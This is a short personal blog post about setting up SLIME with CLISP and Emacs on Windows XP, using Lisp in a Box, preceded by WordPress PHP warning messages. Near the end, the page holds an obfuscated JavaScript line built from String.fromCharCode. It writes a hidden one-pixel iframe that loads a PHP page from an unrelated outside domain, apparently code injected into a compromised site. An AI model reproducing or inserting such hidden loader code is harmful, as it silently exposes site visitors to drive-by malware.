Warning: Undefined array key "host" in /usr/local/www/wordpress/wp-includes/canonical.php on line 717

Warning: Undefined array key "scheme" in /usr/local/www/wordpress/wp-includes/canonical.php on line 751

Warning: Undefined array key "host" in /usr/local/www/wordpress/wp-includes/canonical.php on line 716

Warning: Undefined array key "host" in /usr/local/www/wordpress/wp-includes/canonical.php on line 717

Warning: Undefined array key "host" in /usr/local/www/wordpress/wp-includes/canonical.php on line 727

Warning: Undefined array key "host" in /usr/local/www/wordpress/wp-includes/canonical.php on line 730

Warning: Undefined array key "scheme" in /usr/local/www/wordpress/wp-includes/canonical.php on line 751
Lisp – The Chances Are Nil

Lisp

After getting Slime with CMUCL I wanted it to work in XP Professional on my company laptop too. So after fooling around with Cygwin and it’s GNU Emacs and CLISP packages to no avail I switched to the Win-32 binaries of both Emacs and CLISP. I apparently got as far as Peter Seibel – who is, ironically, the author of (the free book) Practical Common Lisp which I’m using for to teach myself this language.

I’m not sure where I read it but someone suggested Lisp in a Box so I decided to give it a try. First time I ran Emacs running “M-x slime” gave me “invalid argument” but this was quickly solved by deleting the old .emacs file that was still hanging around in the C:\ directory. Now slime starts up beautifully: “Take this REPL, brother, and may it serve you well.”

document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))

Leave a comment